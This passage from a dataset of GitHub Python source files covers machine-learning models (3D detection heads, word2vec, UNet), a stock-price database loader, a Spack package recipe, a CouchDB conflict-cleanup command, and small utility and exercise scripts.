self.domain_pool(spatial_features_2d).view(spatial_features_2d.size(0), -1)\n x_reverse = grad_reverse(x_pool, l*-1)\n # dom_img_preds = self.domain_classifier(x_reverse).squeeze(-1)\n\n dom_head_context = self.domain_classifier[:-2](x_reverse)\n\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context'] = dom_head_context\n\n dom_img_preds = self.domain_classifier[-2:](dom_head_context)\n\n self.forward_ret_dict['dom_img_preds'] = dom_img_preds\n\n if self.training:\n targets_dict_dom = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n dom_src=dom_src,\n pseudo=pseudo\n )\n self.forward_ret_dict.update(targets_dict_dom)\n\n if 'det' not in t_mode:\n return data_dict\n\n dom_head_context = data_dict[f'dom_head_context']\n\n dom_head_context_reshape = dom_head_context.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d.shape[-2],spatial_features_2d.shape[-1])\n\n spatial_features_2d = torch.cat((spatial_features_2d, dom_head_context_reshape), dim=1)\n\n cls_preds = self.conv_cls(spatial_features_2d)\n box_preds = self.conv_box(spatial_features_2d)\n\n cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]\n box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]\n\n self.forward_ret_dict['cls_preds'] = cls_preds\n self.forward_ret_dict['box_preds'] = box_preds\n\n if self.conv_dir_cls is not None:\n dir_cls_preds = self.conv_dir_cls(spatial_features_2d)\n dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 
1).contiguous()\n self.forward_ret_dict['dir_cls_preds'] = dir_cls_preds\n else:\n dir_cls_preds = None\n\n if self.training:\n if pseudo:\n pseudo_weights = data_dict['pseudo_weights']\n else:\n pseudo_weights = None\n\n targets_dict = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n pseudo=pseudo,\n pseudo_weights=pseudo_weights\n )\n\n self.forward_ret_dict.update(targets_dict)\n\n if not self.training or self.predict_boxes_when_training:\n batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(\n batch_size=data_dict['batch_size'],\n cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds\n )\n data_dict['batch_cls_preds'] = batch_cls_preds\n data_dict['batch_box_preds'] = batch_box_preds\n data_dict['cls_preds_normalized'] = False\n\n if self.rangeinv:\n # print(\"spatial_features_2d\", spatial_features_2d.shape) #512,128,128\n thresh = self.rm_thresh\n\n start_dim = int(spatial_features_2d.shape[-1]/4.)\n mid_dim = int(spatial_features_2d.shape[-1]/2.)\n end_dim = start_dim+int(spatial_features_2d.shape[-1]/2.)\n\n near_idx = torch.LongTensor([i for i in range(start_dim, mid_dim-thresh)]+[i for i in range(mid_dim+thresh, end_dim)])\n far_idx = torch.LongTensor([i for i in range(start_dim)]+[i for i in range(end_dim, spatial_features_2d.shape[-1])])\n\n if self.keep_x:\n near_feat_2d = spatial_features_2d[:,:,:,near_idx]\n far_feat_2d = spatial_features_2d[:,:,:, far_idx]\n elif self.keep_y:\n near_feat_2d = spatial_features_2d[:,:,near_idx,:]\n far_feat_2d = spatial_features_2d[:,:,far_idx,:]\n\n near_feat_2d_reverse = grad_reverse(near_feat_2d, l*-1)\n range_pred_near = self.conv_range(near_feat_2d_reverse)\n # print(\"near_range_pred\", near_range_pred.shape)\n far_feat_2d_reverse = grad_reverse(far_feat_2d, l*-1)\n range_pred_far = self.conv_range(far_feat_2d_reverse)\n # print(\"far_range_pred\", far_range_pred.shape)\n\n range_labels_near = torch.ones((range_pred_near.shape), dtype=torch.float32, device=spatial_features_2d.device)\n\n range_labels_far = torch.zeros((range_pred_far.shape), dtype=torch.float32, device=spatial_features_2d.device)\n\n targets_dict_range = {\n 'range_pred_near': range_pred_near,\n 'range_pred_far': range_pred_far,\n 'range_labels_near': range_labels_near,\n 'range_labels_far': range_labels_far,\n }\n self.forward_ret_dict.update(targets_dict_range)\n\n\n return data_dict","repo_name":"zhangweichen2006/SRDAN_Open","sub_path":"pcdet/models/dense_heads/anchor_head_single_range_guidance.py","file_name":"anchor_head_single_range_guidance.py","file_ext":"py","file_size_in_byte":20599,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"45"} +{"seq_id":"4941482715","text":"import argparse\nimport time\n\n\ndef main(args):\n print(\"=\" * 40, \" FILE I/O \", \"=\" * 40)\n start_time0 = time.time()\n\n if args.test:\n input_path = \"day14/day14_test.txt\"\n else:\n input_path = \"day14/day14_input.txt\"\n\n with open(input_path, \"r\") as f:\n lines = f.readlines()\n\n for line in lines:\n pass\n\n stop_time0 = time.time()\n print(f\"File IO finished in {(stop_time0 - start_time0) * 1000} milliseconds\")\n\n print(\"=\" * 40, \" PART ONE \", \"=\" * 40) #### PART 1 ####\n start_time1 = time.time()\n answer = \"PLACEHOLDER\"\n stop_time1 = time.time()\n print(\n f\"Final answer: {answer}, found in {(stop_time1 - start_time1) * 1000} milliseconds\"\n )\n\n print(\"=\" * 40, \" PART TWO \", \"=\" * 40) #### PART 2 ####\n start_time2 = time.time()\n answer = \"PLACEHOLDER\"\n stop_time2 = 
time.time()\n print(\n f\"Final answer: {answer}, found in {(stop_time2 - start_time2) * 1000} milliseconds\"\n )\n\n\nif __name__ == \"__main__\":\n arg = argparse.ArgumentParser()\n arg.add_argument(\"--test\", action=\"store_true\")\n\n args = arg.parse_args()\n\n main(args)\n","repo_name":"OllieOA/advent_of_code_2021","sub_path":"daynum/daynum.py","file_name":"daynum.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74872662216","text":"#!/usr/bin/env python3\nimport sqlite3, config\nimport alpaca_trade_api as tradeapi\nimport numpy as np\nimport tulipy as ti\nfrom datetime import date, timedelta\n\nconnection = sqlite3.connect(config.DB_FILE)\n\nconnection.row_factory = sqlite3.Row\n\ncursor = connection.cursor()\n\ncursor.execute(\"\"\"\n SELECT id, symbol, name FROM stock\n\"\"\")\n\nrows = cursor.fetchall()\n\nsymbols = []\nstock_dict = {}\nfor row in rows:\n symbol = row['symbol']\n symbols.append(symbol)\n stock_dict[symbol] = row['id']\n\napi = tradeapi.REST(config.API_KEY, config.SECRET_KEY, base_url=config.API_URL)\n\nlatest_day=date.today()-timedelta(days=1)\n#remember to edit this line according to when you are running cron job\n\ncursor.execute(\"\"\"\n DELETE FROM stock_price\n\"\"\")\n\nchunk_size = 200\nfor i in range(0, len(symbols), chunk_size):\n symbol_chunk = symbols[i:i+chunk_size]\n barsets = api.get_barset(symbol_chunk, 'day')\n for symbol in barsets:\n \n print(f\"processing symbol {symbol}\")\n\n # print(barsets[symbol])\n\n recent_closes = [bar.c for bar in barsets[symbol]]\n\n # print(rsi_14)\n # print(sma_20)\n # print(sma_50)\n\n for bar in barsets[symbol]:\n stock_id = stock_dict[symbol]\n \n # print(latest_day.isoformat())\n # print(bar.t.date().isoformat())\n # print(type(latest_day.isoformat()))\n # print(type(bar.t.date().isoformat()))\n\n if len(recent_closes)>=50 and latest_day.isoformat() == bar.t.date().isoformat():\n\n sma_20 = ti.sma(np.array(recent_closes), period=20)[-1]\n sma_50 = ti.sma(np.array(recent_closes), period=50)[-1]\n rsi_14 = ti.rsi(np.array(recent_closes), period=14)[-1]\n else:\n sma_20, sma_50, rsi_14 = None, None, None\n\n cursor.execute(\"\"\"\n INSERT INTO stock_price (stock_id, date, open, high, low, close, volume, sma_20, sma_50, rsi_14)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\", (stock_id, bar.t.date(), bar.o, bar.h, bar.l, bar.c, bar.v, sma_20, sma_50, rsi_14))\nconnection.commit()\n\n# barsets = api.get_barset(['Z'], 'minute')\n# # print(barsets)\n\n# for symbol in barsets:\n# print(f\"processing symbol {symbol}\")\n\n# for bar in barsets[symbol]:\n# print (bar.t, bar.o, bar.h, bar.l, bar.c, bar.v)","repo_name":"amitrahman1026/algotrading","sub_path":"fullstack-trading-app/populate_prices.py","file_name":"populate_prices.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36545128027","text":"import os\nimport sys\n\n\n# python main,py dir_name phrase\n## return list of files of phrase found\n\n\nhead_list = []\n\ndef searchfile(phrase,file):\n\ttry:\n\t\tfile = open(file,\"r\")\n\t\tdata = file.read()\n\t\tresult = data.find(phrase)\n\t\tif result == -1:\n\t\t\treturn False\n\t\treturn True\n\texcept:\n\t\tprint(\"Error reading file.\")\n\n\ndef search_dir(dir,phrase):\n\tdata = os.listdir(dir)\n\tfile = []\n\tfolder = []\n\trest = []\n\tfor element in data:\n\t\tif os.path.isdir(dir +\"/\" + 
element):\n\t\t\tfolder.append(dir +\"/\" + element)\n\n\t\tif os.path.isfile(dir +\"/\" + element):\n\t\t\tfile.append(dir +\"/\" + element)\n\n\n\tfor f in file:\n\t\tif searchfile(phrase,f):\n\t\t\thead_list.append(f)\n\t\n\tif len(folder) == 0:\n\t\treturn head_list\n\n\tfor d in folder:\n\t\tsearch_dir(d,phrase)\n\n\t\n\ndir_name = sys.argv[2]\nphrase = sys.argv[1]\n\n\nsearch_dir(dir_name,phrase)\n\nfor element in head_list:\n\tprint(element)","repo_name":"nakul-shahdadpuri/random_stuff_in_python","sub_path":"funcfind/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20936405633","text":"import numpy as np\nimport torch\n\nfrom autodo.stage_three_dataset import StageThreeDataset\nfrom autodo.stage_three_model import MyUNet\n\n\nclass StageThreePredictor:\n def __init__(self, model_file, gpu=False):\n self.device = torch.device('cuda:0' if gpu else 'cpu')\n self.net = MyUNet(3, self.device).to(self.device)\n self.net.load_state_dict(torch.load(model_file))\n self.net.eval()\n\n def predict(self, filenames, xcenters_per_image, ycenters_per_image):\n input_data = np.array([\n StageThreeDataset.make_input(filename, xcenters, ycenters)\n for filename, xcenters, ycenters in zip(filenames, xcenters_per_image, ycenters_per_image)\n ])\n input_tensor = torch.from_numpy(input_data).float().to(self.device)\n outputs = self.net(input_tensor)\n return [\n StageThreeDataset.decode_output(output, xcenters, ycenters)\n for output, xcenters, ycenters in zip(outputs, xcenters_per_image, ycenters_per_image)\n ]\n","repo_name":"MatthewScholefield/autodo","sub_path":"autodo/stage_three_predictor.py","file_name":"stage_three_predictor.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"8036965244","text":"import numpy as np\n\ndef fetchData(filename, x_beg, x_size, y_beg, y_size):\n raw = np.loadtxt(filename)\n x = raw[:,x_beg:x_beg + x_size]\n y = raw[:,y_beg:y_beg + y_size]\n ave = np.average(y)\n y = [[1] if p[0] > ave else [-1] for p in y]\n y = np.array(y)\n return x,y","repo_name":"KnowingNothing/AdaBoost","sub_path":"dataOp.py","file_name":"dataOp.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72362785095","text":"import gensim, logging\nimport smart_open, os\nimport nltk\nimport multiprocessing\nimport string\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nsource_dir = '/home/tuong/Downloads/Text_Classification/'\n\ndef get_filepaths(directory):\n \"\"\"\n Load data file paths\n :param directory:\n :return:\n \"\"\"\n file_paths = []\n for root, directories, files in os.walk(directory):\n for filename in files:\n file_path = os.path.join(root, filename)\n file_paths.append(file_path)\n return file_paths\n\ndef preprocess():\n filenames = get_filepaths(source_dir+'data')\n vocab = dict()\n with open(source_dir + 'metadata/data.vn.txt', 'w') as f:\n for file in filenames:\n with open(file, 'r') as fr:\n for sent in nltk.sent_tokenize(fr.read()):\n if sent != '\\n':\n f.write(sent+'\\n')\n for w in nltk.word_tokenize(sent):\n if w not in string.punctuation:\n if w not in vocab:\n vocab[w.lower()]=1\n else: vocab[w.lower()]+=1\n with open(source_dir+'metadata/vocab.txt', 'w') as f:\n for w in vocab:\n f.write(w+' 
'+str(vocab[w])+'\\n')\n\ndef train():\n # sentences = gensim.models.word2vec.LineSentence(source_dir+'metadata/data.vn.txt')\n sentences = gensim.models.word2vec.Text8Corpus(source_dir+'metadata/data.vn.txt')\n model = gensim.models.Word2Vec(sentences, size=2, workers=multiprocessing.cpu_count(), min_count=1)\n model.save(source_dir+'word2vec/word2vec.vn.bin')\n print(model.wv.vocab)\n\ndef load(dir):\n model = gensim.models.Word2Vec.load(dir)\n vector = {}\n for word in model.wv.vocab.keys():\n vector[word] = model[word]\n\n print(vector)\n\nif __name__=='__main__':\n #preprocess()\n #train()\n load(source_dir+'word2vec/word2vec.vn.bin')","repo_name":"lqtuong/word2vec","sub_path":"word2vec_gensim.py","file_name":"word2vec_gensim.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73660136775","text":"import pandas as pd\n\n# This file is purely meant for data analysis\n\ndata_df = pd.read_excel('./data/existing-customers.xlsx')\n\n# Search for missing values\ntotal = data_df.isnull().sum().sort_values(ascending=False)\npercent_1 = data_df.isnull().sum()/data_df.isnull().count()*100\npercent_2 = (round(percent_1, 1)).sort_values(ascending=False)\nmissing_data = pd.concat([total, percent_2], axis=1, keys=['Total', '%'])\nprint(missing_data.head(16))\n\n# Race analysis to see whether race is a good feature to consider for predicting income (looking for bias)\ntotal = data_df['race'].value_counts()\npercentage = round((data_df['race'].value_counts()/len(data_df))*100)\nrace_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(race_count)\n\n# sex\ntotal = data_df['sex'].value_counts()\npercentage = round((data_df['sex'].value_counts()/len(data_df))*100)\nsex_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(sex_count)\n\n# workclass\ntotal = data_df['workclass'].value_counts()\npercentage = round((data_df['workclass'].value_counts()/len(data_df))*100)\nworkclass_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(workclass_count)\n\n# native country\ntotal = data_df['native-country'].value_counts()\npercentage = round((data_df['native-country'].value_counts()/len(data_df))*100)\ncountry_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(country_count)\n\n# class\ntotal = data_df['class'].value_counts()\npercentage = round((data_df['class'].value_counts()/len(data_df))*100)\nclass_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\nprint(class_count)\n\n# occupation\ntotal = data_df['occupation'].value_counts()\npercentage = round((data_df['occupation'].value_counts()/len(data_df))*100)\noccupation_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(occupation_count)\n\n# marital-status\ntotal = data_df['marital-status'].value_counts()\npercentage = round((data_df['marital-status'].value_counts()/len(data_df))*100)\nmarital_status_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(marital_status_count)\n","repo_name":"JasperDeLaet/DataminingClassification","sub_path":"src/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"16011276648","text":"from spack import *\nfrom spack.environment import *\n\nclass Lalinference(Package):\n \"\"\"LSC Algorithm Library - Inference\n LIGO 
Scientific Collaboration Algorithm Library - Inference containing \\\n routines for Bayesian inference data analysis.\n \"\"\"\n\n homepage = \"https://www.lsc-group.phys.uwm.edu/daswg/projects/lalsuite.html\"\n url = \"http://software.ligo.org/lscsoft/source/lalsuite/lalinference-1.6.0.tar.xz\"\n\n version('1.9.1', '2700ed18099222b12ac4e54140a0aa4b')\n version('1.9.0', '2f38e128937d16fe2f110b18faf62234')\n version('1.8.2', '27a44963832ad7e24de22a05545baac8')\n version('1.8.1', '8fa4d3fe315b9c4d5b91c47dab9448e5')\n version('1.8.0', '6a7baa397b93390f8cdd2ba8676a5ace')\n version('1.7.0', '29ebf36a1e989f6a6e2ad2b12050244c')\n version('1.6.0', 'e4f68dc673dd9a24730e2e8473c363b3')\n\n variant('swig_python', True, 'Generate SWIG bindings for Python')\n variant('octave', False, 'Generate SWIG bindings for Octave')\n variant('fastgsl', False, 'Enable fast/inline GSL code')\n variant('hdf5', default=True)\n variant('openmp', True, 'Enable OpenMP')\n\n extends(\"python\")\n\n depends_on(\"chealpix\")\n depends_on(\"gsl\")\n depends_on(\"metaio\")\n depends_on(\"libxml2\")\n depends_on(\"py-healpy\")\n\n depends_on('swig', when='+swig_python')\n depends_on('swig', when='+octave')\n depends_on('py-numpy', when='+swig_python')\n depends_on('octave+fftw', when='+octave')\n\n depends_on('lalframe')\n depends_on('lalmetaio')\n depends_on('lal')\n depends_on('lalinspiral')\n depends_on('lalburst')\n depends_on('lalxml')\n depends_on('lalpulsar')\n depends_on('lalsimulation')\n\n \n# for p in ['+swig_python', '~swig_python']:\n# for o in ['+octave', '~octave']:\n# depends_on('lalframe' + p + o, when=p + o)\n# depends_on('lalmetaio' + p + o, when=p + o)\n# for f in ['+fastgsl', '~fastgsl']:\n# depends_on('lal' + p + o + f, when=p + o + f)\n# depends_on('lalinspiral' + p + o + f, when=p + o + f)\n# depends_on('lalburst' + p + o + f, when=p + o + f)\n# depends_on('lalxml' + p + o + f, when=p + o + f)\n#\n# for m in ['+openmp', '~openmp']:\n# depends_on('lalpulsar' + p + o + f + m, when=p + o + f + m)\n# depends_on('lalsimulation' + p + o + f + m, when=p + o + f + m)\n\n def install(self, spec, prefix):\n config_args = ['--prefix=%s' % prefix]\n\n if '+swig_python' in spec:\n config_args.append('--enable-swig-python')\n else:\n config_args.append('--disable-swig-python')\n\n if '+octave' in spec:\n config_args.append('--enable-swig-octave')\n else:\n config_args.append('--disable-swig-octave')\n\n if '+fastgsl' in spec:\n config_args.append('--enable-fast-gsl')\n else:\n config_args.append('--disable-fast-gsl')\n\n if '+hdf5' in spec:\n config_args.append('--with-hdf5=%s' % (join_path(spec['hdf5'].prefix.bin,'h5cc')))\n else:\n config_args.append('--with-hdf5=no')\n\n if '+openmp' in spec:\n config_args.append('--enable-openmp')\n else:\n config_args.append('--disable-openmp')\n\n configure(*config_args)\n\n make()\n make(\"install\")\n\n def setup_environment(self, spack_env, run_env):\n run_env.set('LALINFERENCE_PREFIX', self.spec.prefix)\n run_env.set(\"LALINFERENCE_DATADIR\",\n join_path(self.prefix.share, 'lalinference'))\n# source_file = join_path(self.prefix.etc,'lalinference-user-env.sh')\n# if can_access(source_file):\n# source_file_env = EnvironmentModifications.from_sourcing_files(source_file)\n# run_env.extend(source_file_env)\n#\n# run_env.set('LALINFERENCE_PREFIX', self.spec.prefix)\n# run_env.set(\"LALINFERENCE_DATADIR\",\n# join_path(self.prefix.share, 'lalinference'))\n#\n# # This step is required to overcome a restriction in \n# # \"EnvironmentModifications.from_sourcing_files\" that does not 
properly\n# # handle paths which have no initial value.\n# if '+octave' in self.spec:\n# source_file_env = EnvironmentModifications.from_sourcing_files(\n# join_path(self.prefix.etc,'lalinference-user-env.sh'))\n# modifications = source_file_env.group_by_name()\n# octave_path = modifications['OCTAVE_PATH'][0].value.split(':',1)[0]\n# run_env.append_path(\"OCTAVE_PATH\", octave_path)\n \n","repo_name":"paulhopkins/lvc-spack","sub_path":"packages/lalinference/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43229350320","text":"\"\"\"\nPapers:\n [1] Mikolov T, Chen K, Corrado G, et al. Efficient Estimation of Word Representations in Vector Space[J]. Computer Science, 2013. (https://arxiv.org/pdf/1301.3781.pdf)\n [2] Mikolov T, Sutskever I, Chen K, et al. Distributed Representations of Words and Phrases and their Compositionality[J]. Advances in Neural Information Processing Systems, 2013, 26:3111-3119. (https://arxiv.org/pdf/1310.4546.pdf)\n\"\"\"\n\nfrom __future__ import division\nimport sys\nimport datetime\nimport numpy as np\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Embedding, dot, Reshape, Dense, Merge, Activation\n\nimport utils\n\nclass SkipgramNEG(object):\n \"\"\"\n Skipgram model with negative sampling to speed up.\n\n Methods:\n train():\n train_by_file():\n save_as_w2v_format():\n \"\"\"\n def __init__(self, corpus_file, embedding_dim, min_word_freq=3, \n context_window=2, seperator=' ', negative_sample_rate=1):\n \"\"\"\n Args:\n context_window: int, furthest distance from target word\n corpus_file: string, corpus to train word embedding\n embedding_dim: int, word embedding dimension\n negative_sample_rate: int, negative_sample for each train sample = positive_sample_cnt * negative_sample_rate\n \"\"\"\n self._corpus_file = corpus_file\n self._embedding_dim = embedding_dim\n self._seperator = seperator\n self._min_word_freq = min_word_freq\n self._context_window = context_window\n self._negative_sample_rate = negative_sample_rate\n\n self._word_id_dict, self._id_word_dict, self._word_counter = utils.build_word_dict_by_file(corpus_file, \n seperator, min_word_freq)\n self._vocab_size = len(self._word_id_dict)\n self._model = self._init_model(self._vocab_size, embedding_dim)\n\n def _init_model(self, vocab_size, embedding_dim=100, ):\n # Functional paradigm\n target = Input(shape=(1,), name='target')\n context = Input(shape=(1,), name='context')\n shared_embedding = Embedding(vocab_size, embedding_dim, input_length=1, name='shared_embedding')\n embedding_target = shared_embedding(target)\n embedding_context = shared_embedding(context)\n merged_vector = dot([embedding_target, embedding_context], axes=-1)\n reshaped_vector = Reshape((1,), input_shape=(1,1))(merged_vector)\n prediction = Dense(1, input_shape=(1,), activation='sigmoid')(reshaped_vector)\n\n model = Model(inputs=[target, context], outputs=prediction)\n model.compile(optimizer='adam', loss='binary_crossentropy')\n return model\n\n def train(self, epochs=5, batch_size=512, shuffle=True):\n negative_sample_array_size = 100000000 # due to paper [1]\n negative_sample_array = utils.build_negative_sample_array(self._word_counter, self._word_id_dict,\n negative_sample_array_size)\n\n for epoch_id in xrange(epochs):\n # train by batch\n batch_id = 0\n x_batch = [[],[]]\n y_batch = []\n loss_list = []\n reader = utils.NEG_reader_creator(self._word_id_dict, 
\n self._corpus_file, negative_sample_array, self._word_counter,\n self._context_window, self._negative_sample_rate, self._seperator)\n if shuffle:\n reader = utils.shuffle(reader, batch_size*30)\n for word_ids, label in reader():\n batch_id += 1\n x_batch[0].append(word_ids[0])\n x_batch[1].append(word_ids[1])\n y_batch.append(label)\n if batch_id % (batch_size*100) == 0:\n sys.stdout.write('\\r[epoch #%d] batch #%d, train loss:%s' % (epoch_id, \n batch_id, np.mean(loss_list)))\n sys.stdout.flush()\n loss_list = []\n if batch_id % batch_size == 0:\n X = [np.array(x_batch[0]), np.array(x_batch[1])]\n loss = self._model.train_on_batch(X, np.array(y_batch))\n loss_list.append(loss)\n x_batch = [[],[]]\n y_batch = []\n sys.stdout.write('\\n%s [epoch #%d] done\\n' % (\n datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), epoch_id))\n\n def save_as_w2v_format(self, output_file, use_word_id_key=False):\n \"\"\"\n Store word embedding result to text file.\n\n Args:\n output_file: string, w2v file output path\n use_word_id_key: bool, if true, key is word_id; other wise key is word\n Returns:\n int, 0 success, else fail\n \"\"\"\n with open(output_file, 'w') as fwrite:\n fwrite.write('%d %d\\n' % (len(self._word_id_dict), self._embedding_dim))\n for idx, vec in enumerate(self._model.layers[2].get_weights()[0].tolist()):\n if use_word_id_key:\n fwrite.write('%d %s\\n' % (idx, ' '.join([str(_) for _ in vec])))\n else:\n fwrite.write('%s %s\\n' % (self._id_word_dict[idx], ' '.join([str(_) for _ in vec])))\n","repo_name":"lujiaying/keras-word2vec","sub_path":"word2vec/skipgram.py","file_name":"skipgram.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27287775333","text":"import logging\n\nfrom django.core.management.base import BaseCommand\n\nfrom couchdbkit.exceptions import BulkSaveError\n\nfrom dimagi.utils.couch.database import get_db\n\nfrom corehq.util.couch import categorize_bulk_save_errors\n\nlogger = logging.getLogger(__name__)\n\n\ndef bulk_delete(db, docs):\n if not docs:\n return\n\n logger.info(\"Deleting {} doc revisions\".format(len(docs)))\n try:\n db.bulk_delete(docs)\n except BulkSaveError as e:\n errors = categorize_bulk_save_errors(e)\n successes = errors.pop(None, [])\n conflicts = errors.pop('conflict', [])\n logger.error(\"BulkSaveError: {} successful, {} conflicts\".format(len(successes), len(conflicts)))\n for error, results in errors.items():\n logger.error(results)\n else:\n logger.info('{} doc revisions deleted'.format(len(docs)))\n\n\nclass Command(BaseCommand):\n help = 'Delete document conflicts'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--batch_size',\n action='store',\n type=int,\n dest='batch',\n default=500,\n help=\"Only process this many docs.\",\n )\n\n def handle(self, **options):\n db = get_db()\n while True:\n results = db.view('doc_conflicts/conflicts', reduce=False, limit=options['batch'], include_docs=True, conflicts=True)\n total = results.total_rows\n if not total:\n logger.info('Document conflict deletion complete')\n return\n logger.info('Processing {} of {} docs'.format(len(results), total))\n to_delete = []\n for row in results:\n doc = row['doc']\n conflicts = doc.get('_conflicts', [])\n doc_id = doc['_id']\n logger.info('Deleting {} conflicts for doc: {}'.format(len(conflicts), doc_id))\n for rev in conflicts:\n to_delete.append({\n '_id': doc_id,\n '_rev': rev\n })\n if len(to_delete) > 100:\n bulk_delete(db, 
to_delete)\n to_delete = []\n\n bulk_delete(db, to_delete)\n","repo_name":"dimagi/commcare-hq","sub_path":"corehq/apps/cleanup/management/commands/delete_doc_conflicts.py","file_name":"delete_doc_conflicts.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":472,"dataset":"github-code","pt":"45"} +{"seq_id":"38703035123","text":"import sys\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef is_valid_bst_node_helper(node, lb, ub):\n\n if node and node.val <= ub and node.val >= lb:\n return is_valid_bst_node_helper(node.left, lb, node.val) and \\\n is_valid_bst_node_helper(node.right, node.val, ub)\n\n return not node # if node is None, it's a valid BST\n\n\ndef is_valid_bst(root):\n return is_valid_bst_node_helper(root, -sys.maxsize, sys.maxsize)\n\n\n# Tests\n\n\nassert is_valid_bst(None)\n\na = Node(3)\nb = Node(2)\nc = Node(6)\nd = Node(1)\ne = Node(3)\nf = Node(4)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nassert is_valid_bst(a)\n\n\na = Node(1)\nb = Node(2)\nc = Node(6)\nd = Node(1)\ne = Node(3)\nf = Node(4)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nassert not is_valid_bst(a)\n\na = Node(3)\nb = Node(2)\nc = Node(6)\nd = Node(1)\ne = Node(4)\nf = Node(4)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nassert not is_valid_bst(a)\n","repo_name":"ngiengkianyew/daily-coding-problem","sub_path":"solutions/problem_089.py","file_name":"problem_089.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"45"} +{"seq_id":"4538956578","text":"from threading import Thread\nimport numpy as np\nimport math\nimport cv2\n\nIMG_SIZE = 1000\nRADIAN_CONV = math.pi / 180\n\ndef draw_text(img, text,\n font=cv2.FONT_HERSHEY_PLAIN,\n pos=(0, 0),\n font_scale=3,\n font_thickness=2,\n text_color=(0, 255, 0),\n text_color_bg=(0, 0, 0)\n ):\n\n x, y = pos\n text_size, _ = cv2.getTextSize(text, font, font_scale, font_thickness)\n text_w, text_h = text_size\n cv2.rectangle(img, (x-5,y-5), (x + text_w+5, y + text_h+5), text_color_bg, -1)\n cv2.putText(img, text, (x, y + text_h + font_scale - 1), font, font_scale, text_color, font_thickness)\n\n return text_size\n\nclass ComputingUnit:\n def __init__(self, raw_points, multi_factor, max_range, image_size=IMG_SIZE):\n self.raw_points = raw_points\n self.multi_factor = multi_factor\n self.image_size = image_size\n self.center = self.image_size // 2\n self.max_range = max_range\n self.img = np.zeros((image_size, image_size, 3), np.uint8)\n\n\n def compute(self):\n self.img[:, :, :] = 0\n\n min_distance = np.min(self.raw_points[:, 0])\n pos = (20, 30)\n show_txt = \"Minimum Distance: %.1f cm\" % (min_distance / 10)\n\n for i in range(self.raw_points.shape[0]):\n (distance, confidence) = self.raw_points[i]\n angle = i / 2\n\n show_distance = distance / self.max_range * (self.image_size)\n\n color = (255, 0, 0)\n line_color = (0, 125, 125)\n if distance <= (min_distance+30):\n color = (0, 0, 255)\n line_color = (0, 0, 255)\n\n radian = angle * RADIAN_CONV\n\n x = int(show_distance * math.cos(radian) + (self.center))\n y = int(show_distance * math.sin(radian) + (self.center))\n\n cv2.line(self.img, (self.center, self.center), (x, y), line_color, 2)\n cv2.circle(self.img, (x, y), 2, color, 2)\n\n cv2.circle(self.img, (self.center, self.center), 2, (0, 255, 0), 4)\n draw_text(self.img, show_txt, pos=pos, font_scale=2, 
